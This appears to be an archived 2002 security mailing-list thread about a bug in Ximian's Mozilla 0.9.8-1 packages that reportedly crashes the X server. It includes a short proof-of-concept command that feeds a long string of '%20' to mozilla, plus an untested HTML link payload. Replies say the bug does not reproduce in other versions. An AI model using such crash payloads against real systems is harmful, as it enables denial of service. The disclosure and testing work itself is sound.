On Sun, 2002-02-17 at 17:48, NyQuist wrote: > On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote: > > NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't > > make it since this doesn't seem to affect a redhat itself, it affects > > the mozilla packages distrbuted by Ximian: > > > > The test system look like: > > > > bash#~ rpm -qa | grep mozilla > > mozilla-0.9.8-1.ximian.2 > > mozilla-mail-0.9.8-1.ximian.2 > > mozilla-xmlterm-0.9.8-1.ximian.2 > > mozilla-devel-0.9.8-1.ximian.2 > > nautilus-mozilla-1.0.6-ximian.4 > > mozilla-psm-0.9.8-1.ximian.2 > > kdebindings-kmozilla-2.1.1-1 > > > > This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the > > the updates). > > > > > > There is a bug in mozilla 0.9.8-1 which allows you > > to Crash the X server. > > > > I won't go into details I'll just show the proof > > of concept. > > > > > > exploit: > > > > Local: > > bash#~ mozilla `perl -e "print '%20' x 2618"` > > > > > > Remote: > > I haven't test this but i guess: > > > > echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> > > ./attack.html > > > > perhaps using "img src" or java script... > > > > > > Best Regards > > > > -- > > /* > > Rodrigo Gutierrez <rodrigoat_private> > > Trustix AS http://www.trustix.com > > */ > > > One one box: rpm -qa | grep mozilla > mozilla-chat-0.9.7-1 > mozilla-mail-0.9.7-1 > nautilus-mozilla-1.0.6-ximian.6 > mozilla-0.9.7-1 > mozilla-devel-0.9.7-1 > mozilla-js-debugger-0.9.7-1 > mozilla-psm-0.9.7-1 > mozilla-dom-inspector-0.9.7-1 > > Results in "www.perl -e "print %20 x 2618".com could not be found (lol) > perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't > overflow perl. > > On other box: rpm -qa | grep mozilla > nautilus-mozilla-1.0.6-ximian.6 > mozilla-psm-0.9.8-2 > mozilla-0.9.8-2 > mozilla-devel-0.9.8-2 > > Results in same 'not found' error. > > The attack.html (as per your script) results in "www.'perl not found". > So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in > 0.9.8-2. > Oops, did miss the `' thing :) But even with the right switch `perl - "print '%20' x 2618"` just brings up an empty error box with mozilla-0.9.8-2. Galeon actually shows the url (%20 2618 times), and i've tried x 5000 just to see if it overflows. > -- > NyQuist | Matthew Hall -- NyQuist at ntlworld dot com > Sig: Microsoft sells you Windows. Linux gives you the whole house. >
This archive was generated by hypermail 2b30 : Sun Feb 17 2002 - 20:42:45 PST